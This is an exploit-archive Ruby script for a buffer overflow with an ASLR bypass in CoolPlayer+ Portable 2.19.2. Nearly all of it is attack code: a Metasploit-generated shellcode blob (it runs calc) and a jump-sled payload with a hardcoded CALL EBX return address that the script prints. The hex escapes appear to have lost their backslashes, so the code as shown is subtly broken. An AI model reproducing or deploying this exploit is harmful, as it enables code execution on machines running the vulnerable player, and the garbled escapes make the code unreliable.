
# Title : CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass (Large Shellcode)
# Published : 2012-08-06
# Author :


#!/usr/bin/ruby

# Exploit for CoolPlayer+ Portable 2.19.2
#
# Based on exploit by Blake and Dhruval.
# Vulnerability found by Securityxxxpert
# Original: http://www.exploit-db.com/exploits/20262/
#
# This one by Robert Larsen <robert@the-playground.dk>
# Lots of room for shellcode as opposed to original exploit.

# Shellcode created with:
# msfpayload windows/exec CMD=calc R | msfencode -b 'x00x0ax0c'
SHELLCODE=
"xdaxd6xd9x74x24xf4xb8x3axbdx65xf7x5ex31xc9" +
"xb1x32x31x46x17x03x46x17x83xd4x41x87x02xd4" +
"x52xc1xedx24xa3xb2x64xc1x92xe0x13x82x87x34" +
"x57xc6x2bxbex35xf2xb8xb2x91xf5x09x78xc4x38" +
"x89x4cxc8x96x49xcexb4xe4x9dx30x84x27xd0x31" +
"xc1x55x1bx63x9ax12x8ex94xafx66x13x94x7fxed" +
"x2bxeexfax31xdfx44x04x61x70xd2x4ex99xfaxbc" +
"x6ex98x2fxdfx53xd3x44x14x27xe2x8cx64xc8xd5" +
"xf0x2bxf7xdaxfcx32x3fxdcx1ex41x4bx1fxa2x52" +
"x88x62x78xd6x0dxc4x0bx40xf6xf5xd8x17x7dxf9" +
"x95x5cxd9x1dx2bxb0x51x19xa0x37xb6xa8xf2x13" +
"x12xf1xa1x3ax03x5fx07x42x53x07xf8xe6x1fxa5" +
"xedx91x7dxa3xf0x10xf8x8axf3x2ax03xbcx9bx1b" +
"x88x53xdbxa3x5bx10x13xeexc6x30xbcxb7x92x01" +
"xa1x47x49x45xdcxcbx78x35x1bxd3x08x30x67x53" +
"xe0x48xf8x36x06xffxf9x12x65x9ex69xfex6a"

payload = "xebx4e" * (232 / 2) + #JMP 80
          "x5dxecxf8x77"     + #CALL EBX
          "x90x90x90x90"     + #Junk
          SHELLCODE

puts payload